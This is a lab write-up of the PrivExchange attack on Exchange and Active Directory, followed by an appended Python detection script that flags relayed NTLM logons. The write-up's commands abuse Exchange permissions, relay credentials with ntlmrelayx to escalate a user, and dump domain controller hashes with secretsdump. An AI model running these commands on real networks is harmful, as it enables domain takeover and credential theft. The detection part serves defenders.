PrivExchange
$ python3 privexchange.py -ah <My Internal IP> <Mail Domain Here> -u <Target Username> -d <domain name>
$ python3 ntlmrelayx.py -t ldap://<FQDN of DC here> --escalate-user <Target Username>
PrivExchange takes advantage of the fact that Exchange servers are over-permissioned by default. This was discovered by Dirk-jan a little over a month ago and is now an excellent way of quickly escalating privileges. It works by querying the Exchange server and getting back a response that contains the Exchange server's credentials, relaying those credentials to the Domain Controller via ntlmrelayx, and then modifying a user's privileges so that user can dump the hashes on the domain controller.

Setting this up was kind of a pain. Exchange 2013 is installed using the default methods on a Windows 2012 R2 server, and I made this modification to the PrivExchange python script to get it to work without a valid SSL certificate. After that, it ran fine.

First, start ntlmrelayx.py, point it at a DC, authenticate via LDAP, and escalate privileges for a user.
$ python3 ntlmrelayx.py -t ldap:// --escalate-user
Then, run privexchange.py by passing in your attacker IP (-ah), the target, and user/password/domain.
$ python privexchange.py -ah 192.168.218.129 LAB2012DC02.lab.local -u rsmith -d lab.local -p Winter201
privexchange.py makes the API call to the Exchange server. If the permissions are set as described, we can escalate the targeted user to DA privileges: ntlmrelayx relays the server's credentials to the DC and then escalates <test user>'s privileges.
We can then use secretsdump.py to dump the hashes on the DC!
$ secretsdump.py /@ -just-dc
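A defender-side check added here (not part of the original notes and not code from the PrivExchange or impacket projects): the relay described above shows up on the DC as the Exchange computer account authenticating with NTLM from an address that is not the Exchange server's own. The script scans constructed sample logon records for that pattern; the host inventory, the key=value field layout and the IP addresses are assumptions.

```python
import re
from typing import Dict, List

# Assumed inventory of Exchange computer accounts and the address each one
# really owns (hypothetical values for this example).
EXCHANGE_HOSTS: Dict[str, str] = {"EXCH01$": "192.168.218.10"}

# Constructed sample records (not real Windows event text) in a simplified
# key=value layout carrying the fields a defender would pull from DC logon
# events: event id, account, logon type, auth package, source address.
SAMPLE_LOG = """\
event=4624 account=EXCH01$ logon_type=3 package=NTLM src_ip=192.168.218.10
event=4624 account=rsmith logon_type=3 package=Kerberos src_ip=192.168.218.50
event=4624 account=EXCH01$ logon_type=3 package=NTLM src_ip=192.168.218.129
event=4624 account=EXCH01$ logon_type=3 package=Kerberos src_ip=192.168.218.10
"""

LINE_RE = re.compile(r"(\w+)=(\S+)")


def parse_record(line: str) -> Dict[str, str]:
    """Turn one key=value line into a dict of its fields."""
    return dict(LINE_RE.findall(line))


def find_relayed_machine_logons(log: str, hosts: Dict[str, str]) -> List[Dict[str, str]]:
    """Flag NTLM network logons by a known Exchange computer account that
    arrive from an address other than the one that host owns. A relayed
    Exchange credential reaches the DC from the relaying machine, so the
    source address no longer matches the server's real address."""
    hits: List[Dict[str, str]] = []
    for line in log.splitlines():
        rec = parse_record(line)
        if rec.get("event") != "4624" or rec.get("logon_type") != "3":
            continue  # only network logons are relevant here
        if rec.get("package") != "NTLM":
            continue  # Kerberos logons cannot be produced by an NTLM relay
        expected_ip = hosts.get(rec.get("account", ""))
        if expected_ip is not None and rec.get("src_ip") != expected_ip:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_relayed_machine_logons(SAMPLE_LOG, EXCHANGE_HOSTS):
        print(f"possible relay of {hit['account']} from {hit['src_ip']}")
```

In a real deployment the same rule runs over Security log 4624 events on the DC, and a hit should be correlated with subsequent ACL changes on the domain object made by that account.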